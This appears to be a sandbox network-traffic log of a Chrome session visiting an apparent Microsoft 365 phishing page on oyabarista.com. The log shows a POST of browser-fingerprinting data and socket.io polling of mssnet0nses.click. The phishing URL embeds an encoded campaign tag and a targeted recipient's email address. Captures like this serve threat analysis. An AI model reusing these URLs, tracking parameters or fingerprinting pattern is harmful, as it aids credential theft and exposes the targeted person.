                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Content-type: text/plain;charset=UTF-8
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:19 UTC2OUTData Raw: 34 30
                                                        Data Ascii: 40
                                                        2025-03-27 13:42:19 UTC840INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:42:19 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oHo5ExKv1dLKpU7vn%2FPGb%2B1u7pYD0S9MAf4Wy4iG%2FOf3Jp%2BTDmpMReYuyZXtgodyK7xH7QAlfE949fQn1HrU3sjAZv3QIQ8rEf2xGJPYCrrd487gLmY45S4oA49DU2GMkAhmoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f749a35439a-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84148&min_rtt=84109&rtt_var=17759&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1348&delivery_rate=36327&cwnd=251&unsent_bytes=0&cid=cdb6e0dc32e72d5d&ts=307&x=0"
                                                        2025-03-27 13:42:19 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                        Data Ascii: 2ok
                                                        2025-03-27 13:42:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        142192.168.2.54990035.190.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:19 UTC549OUTOPTIONS /report/v4?s=zbxkUsvSYnfAHmNjZJnAMVTbfcKnJhj9G%2BrrqpVAkJpY78q48K5R0ZkIcyJjZ5KeyfZu4FMpwYwVkKKnYPmUyWpoLIcv1WEvXvUpi%2BuOhpYUjo9ajlOIASFP2HVNK%2B4KoDbVMIo%3D HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Origin: https://www.oyabarista.com
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: content-type
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:19 UTC336INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        access-control-max-age: 86400
                                                        access-control-allow-methods: POST, OPTIONS
                                                        access-control-allow-origin: *
                                                        access-control-allow-headers: content-length, content-type
                                                        date: Thu, 27 Mar 2025 13:42:19 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        143192.168.2.54990135.190.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:19 UTC552OUTOPTIONS /report/v4?s=7GSZgEejbSUHi88UdClQe%2F%2BV1T9BBLhcl6EwBLshMTGr1xYwdAasGxVAeuUdMEdgXJzIIicf1tjqtZYkolmtGSnd%2BVFWyZuQicstyr7sWNmue3C6s0Gn%2FPK31C5CEkXTZINEFA%3D%3D HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Origin: https://mssnet0nses.click
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: content-type
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:20 UTC336INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        access-control-max-age: 86400
                                                        access-control-allow-methods: POST, OPTIONS
                                                        access-control-allow-origin: *
                                                        access-control-allow-headers: content-type, content-length
                                                        date: Thu, 27 Mar 2025 13:42:19 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        144192.168.2.549902172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:19 UTC450OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrjtk&sid=sOtA6zh2FsG50UT0AAfZ HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:20 UTC799INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:42:20 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rvjYMEZBSDqIYZv0GnVHbi55eVZ8exzxioyZPF5hYbuwuBW0zapnfZcXabMTjyqbkvBdDqpDskQhKdR281PbvC%2BY5XHSt22NneQx8QO1DirQGq7vOP%2Fy09LBe%2F0pnQYpaC%2BAmA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f77ba42e55d-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84929&min_rtt=84434&rtt_var=18234&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1022&delivery_rate=36113&cwnd=252&unsent_bytes=0&cid=7abdba954069dab0&ts=304&x=0"
                                                        2025-03-27 13:42:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        145192.168.2.54990335.190.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:20 UTC525OUTPOST /report/v4?s=zbxkUsvSYnfAHmNjZJnAMVTbfcKnJhj9G%2BrrqpVAkJpY78q48K5R0ZkIcyJjZ5KeyfZu4FMpwYwVkKKnYPmUyWpoLIcv1WEvXvUpi%2BuOhpYUjo9ajlOIASFP2HVNK%2B4KoDbVMIo%3D HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 6089
                                                        Content-Type: application/reports+json
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:20 UTC6089OUTData Raw: 5b 7b 22 61 67 65 22 3a 32 36 34 37 33 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 32 33 35 2c 22 6d 65 74 68 6f 64 22 3a 22 50 4f 53 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 79 61 62 61 72 69 73 74 61 2e 63 6f 6d 2f 6e 2f 3f 63 33 59 39 62 7a 4d 32 4e 56 38 78 58 32 35 76 62 53 5a 79 59 57 35 6b 50 55 35 49 54 6e 56 56 4d 6d 4d 39 4a 6e 56 70 5a 44 31 56 55 30 56 53 4d 44 51 77 4d 7a 49 77 4d 6a 56 56 4d 6a 6b 77 4d 7a 41 30 4d 44 4d 3d 4e 30 31 32 33 4e 69 6e 66 6f 40 6b 6f 73 74 61 6c 2e 63 6f 6d 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69
                                                        Data Ascii: [{"age":26473,"body":{"elapsed_time":3235,"method":"POST","phase":"application","protocol":"http/1.1","referrer":"https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com","sampling_fracti
                                                        2025-03-27 13:42:20 UTC214INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        access-control-allow-origin: *
                                                        vary: Origin
                                                        date: Thu, 27 Mar 2025 13:42:20 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        146192.168.2.54990535.190.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:20 UTC529OUTPOST /report/v4?s=7GSZgEejbSUHi88UdClQe%2F%2BV1T9BBLhcl6EwBLshMTGr1xYwdAasGxVAeuUdMEdgXJzIIicf1tjqtZYkolmtGSnd%2BVFWyZuQicstyr7sWNmue3C6s0Gn%2FPK31C5CEkXTZINEFA%3D%3D HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 10050
                                                        Content-Type: application/reports+json
                                                        Origin: https://mssnet0nses.click
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:20 UTC10050OUTData Raw: 5b 7b 22 61 67 65 22 3a 39 37 30 36 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 34 37 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 34 2e 38 30 2e 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 30 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 73 73 6e 65 74 30 6e 73 65 73 2e 63 6c 69
                                                        Data Ascii: [{"age":9706,"body":{"elapsed_time":473,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"172.64.80.1","status_code":400,"type":"http.error"},"type":"network-error","url":"https://mssnet0nses.cli
                                                        2025-03-27 13:42:20 UTC214INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        access-control-allow-origin: *
                                                        vary: Origin
                                                        date: Thu, 27 Mar 2025 13:42:19 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        147192.168.2.549889104.21.70.2324436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:20 UTC1041OUTPOST /n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com HTTP/1.1
                                                        Host: www.oyabarista.com
                                                        Connection: keep-alive
                                                        Content-Length: 147028
                                                        Cache-Control: max-age=0
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Origin: https://www.oyabarista.com
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:20 UTC16384OUTData Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65
                                                        Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
                                                        2025-03-27 13:42:20 UTC16384OUTData Raw: 32 43 25 32 32 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42
                                                        Data Ascii: 2C%22XMLHttpRequest%22%3A%22function+XMLHttpRequest%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22XMLDocument%22%3A%22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B
                                                        2025-03-27 13:42:20 UTC16384OUTData Raw: 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 53 74 72 69 6e 67 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 6e 69 6d 61 74 65 64 53 74 72 69 6e 67 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 52 65 63 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 6e 69 6d 61 74 65 64 52 65 63 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 50 72 65 73 65 72 76 65 41 73 70 65 63 74 52 61 74 69 6f 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69
                                                        Data Ascii: Bnative+code%5D+%7D%22%2C%22SVGAnimatedString%22%3A%22function+SVGAnimatedString%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAnimatedRect%22%3A%22function+SVGAnimatedRect%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAnimatedPreserveAspectRatio%22%3A%22functi
                                                        2025-03-27 13:42:20 UTC16384OUTData Raw: 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 6f 6c 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62 6c 65 43 6f 6c 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 65 6c 6c 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62 6c 65 43 65 6c 6c 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 61 70 74 69 6f 6e 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62
                                                        Data Ascii: 7D%22%2C%22HTMLTableColElement%22%3A%22function+HTMLTableColElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLTableCellElement%22%3A%22function+HTMLTableCellElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLTableCaptionElement%22%3A%22function+HTMLTab
                                                        2025-03-27 13:42:20 UTC16384OUTData Raw: 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4c 61 79 65 72 42 6c 6f 63 6b 52 75 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4c 61 79 65 72 42 6c 6f 63 6b 52 75 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4b 65 79 77 6f 72 64 56 61 6c 75 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4b 65 79 77 6f 72 64 56 61 6c 75 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4b 65 79 66 72 61 6d 65 73 52 75 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4b 65 79 66
                                                        Data Ascii: B+%5Bnative+code%5D+%7D%22%2C%22CSSLayerBlockRule%22%3A%22function+CSSLayerBlockRule%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22CSSKeywordValue%22%3A%22function+CSSKeywordValue%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22CSSKeyframesRule%22%3A%22function+CSSKeyf
                                                        2025-03-27 13:42:20 UTC16384OUTData Raw: 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 46 69 6c 65 48 61 6e 64 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 46 69 6c 65 53 79 73 74 65 6d 46 69 6c 65 48 61 6e 64 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 48 61 6e 64 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 46 69 6c 65 53 79 73 74 65 6d 48 61 6e 64 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 57 72 69 74 61 62 6c 65 46 69 6c 65 53 74
                                                        Data Ascii: %28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemFileHandle%22%3A%22function+FileSystemFileHandle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemHandle%22%3A%22function+FileSystemHandle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemWritableFileSt
                                                        2025-03-27 13:42:20 UTC16384OUTData Raw: 32 25 32 43 25 32 32 54 61 73 6b 53 69 67 6e 61 6c 25 32 32 25 32 43 25 32 32 54 61 73 6b 50 72 69 6f 72 69 74 79 43 68 61 6e 67 65 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 54 61 73 6b 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 32 43 25 32 32 54 61 73 6b 41 74 74 72 69 62 75 74 69 6f 6e 54 69 6d 69 6e 67 25 32 32 25 32 43 25 32 32 53 79 6e 63 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 53 75 62 6d 69 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 53 68 65 65 74 4c 69 73 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 53 68 65 65 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 50 72 6f 70 65 72 74 79 4d 61 70 52 65 61 64 4f 6e 6c 79 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 50 72 6f 70 65 72 74 79 4d 61 70 25 32 32 25 32 43 25 32 32 53 74 6f 72
                                                        Data Ascii: 2%2C%22TaskSignal%22%2C%22TaskPriorityChangeEvent%22%2C%22TaskController%22%2C%22TaskAttributionTiming%22%2C%22SyncManager%22%2C%22SubmitEvent%22%2C%22StyleSheetList%22%2C%22StyleSheet%22%2C%22StylePropertyMapReadOnly%22%2C%22StylePropertyMap%22%2C%22Stor
                                                        2025-03-27 13:42:20 UTC16384OUTData Raw: 32 63 6c 6f 73 65 25 32 32 25 32 43 25 32 32 63 6f 6e 66 69 72 6d 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 49 6d 61 67 65 42 69 74 6d 61 70 25 32 32 25 32 43 25 32 32 66 65 74 63 68 25 32 32 25 32 43 25 32 32 66 69 6e 64 25 32 32 25 32 43 25 32 32 66 6f 63 75 73 25 32 32 25 32 43 25 32 32 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 25 32 32 25 32 43 25 32 32 67 65 74 53 65 6c 65 63 74 69 6f 6e 25 32 32 25 32 43 25 32 32 6d 61 74 63 68 4d 65 64 69 61 25 32 32 25 32 43 25 32 32 6d 6f 76 65 42 79 25 32 32 25 32 43 25 32 32 6d 6f 76 65 54 6f 25 32 32 25 32 43 25 32 32 6f 70 65 6e 25 32 32 25 32 43 25 32 32 70 6f 73 74 4d 65 73 73 61 67 65 25 32 32 25 32 43 25 32 32 70 72 69 6e 74 25 32 32 25 32 43 25 32 32 70 72 6f 6d 70 74 25 32 32 25 32 43 25 32 32
                                                        Data Ascii: 2close%22%2C%22confirm%22%2C%22createImageBitmap%22%2C%22fetch%22%2C%22find%22%2C%22focus%22%2C%22getComputedStyle%22%2C%22getSelection%22%2C%22matchMedia%22%2C%22moveBy%22%2C%22moveTo%22%2C%22open%22%2C%22postMessage%22%2C%22print%22%2C%22prompt%22%2C%22
                                                        2025-03-27 13:42:20 UTC15956OUTData Raw: 53 74 61 6d 70 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 74 69 6d 65 53 74 61 6d 70 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 6f 6e 74 65 78 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 6f 6e 74 65 78 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 54 61 73 6b 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 54 61 73 6b 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6d 65 6d 6f 72 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 4d 65 6d 6f 72
                                                        Data Ascii: Stamp%22%3A%22function+timeStamp%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22context%22%3A%22function+context%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createTask%22%3A%22function+createTask%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22memory%22%3A%22%5Bobject+Memor


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        148192.168.2.549906172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:20 UTC450OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrjtl&sid=sOtA6zh2FsG50UT0AAfZ HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:20 UTC829INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:42:20 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xBXUYIlqgmcif7PBYgVgKwjRMOyMY%2BdMTzy3mxkMDiWD%2Bl2m6NS2c242gNKeHLhYo%2BnOj4F7jWAcdusoojfOrNj1FjRxc8jnUIk6pAznALgJTI826HfT9dGrQpFD36ixaEhHBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
